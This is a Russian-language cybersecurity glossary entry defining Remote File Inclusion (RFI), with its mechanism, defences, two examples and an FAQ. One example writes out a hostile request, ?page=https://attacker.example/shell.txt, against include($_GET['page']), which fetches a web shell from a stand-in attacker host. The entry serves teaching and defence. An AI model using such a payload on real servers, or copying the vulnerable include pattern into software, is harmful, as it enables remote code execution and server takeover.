Skip to content
Vol. 1 · Ed. 2026
CyberGlossary
Entry № 1030

Удалённое включение файлов (RFI)

ПроверилCybersecurity entrepreneur & security researcher

Что такое Удалённое включение файлов (RFI)?

Удалённое включение файлов (RFI)Уязвимость, позволяющая злоумышленнику заставить сервер скачать и выполнить код по выбранному им удалённому URL.


Удалённое включение файлов (RFI) возникает, когда приложение передаёт пользовательский ввод в функцию include или require, а среда выполнения допускает удалённые URL (например, PHP с включённым allow_url_include). Сервер скачивает файл с подконтрольного злоумышленнику хоста и выполняет его в процессе приложения, обеспечивая мгновенное удалённое выполнение кода. RFI обычно опаснее LFI, поскольку не требует предварительного доступа на запись к серверу. Защита: отключение удалённого include в среде выполнения, строгий белый список имён статических модулей, никогда не подключать пути, полученные из пользовательского ввода, и сегментирование серверов с жёсткой фильтрацией исходящего трафика.

Примеры

  1. 01

    PHP-приложение с include($_GET['page']), где ?page=https://attacker.example/shell.txt подгружает и запускает веб-шелл.

  2. 02

    Устаревший плагин CMS загружает административную страницу по URL-параметру, позволяя выполнить PHP-файл с сервера злоумышленника.

Частые вопросы

Что такое Удалённое включение файлов (RFI)?

Уязвимость, позволяющая злоумышленнику заставить сервер скачать и выполнить код по выбранному им удалённому URL. Относится к категории Атаки и угрозы в кибербезопасности.

Что означает Удалённое включение файлов (RFI)?

Уязвимость, позволяющая злоумышленнику заставить сервер скачать и выполнить код по выбранному им удалённому URL.

Как защититься от Удалённое включение файлов (RFI)?

Защита от Удалённое включение файлов (RFI) обычно сочетает технические меры и операционные практики, как описано в определении выше.

Какие есть другие названия Удалённое включение файлов (RFI)?

Распространённые альтернативные названия: RFI.

Связанные термины

См. также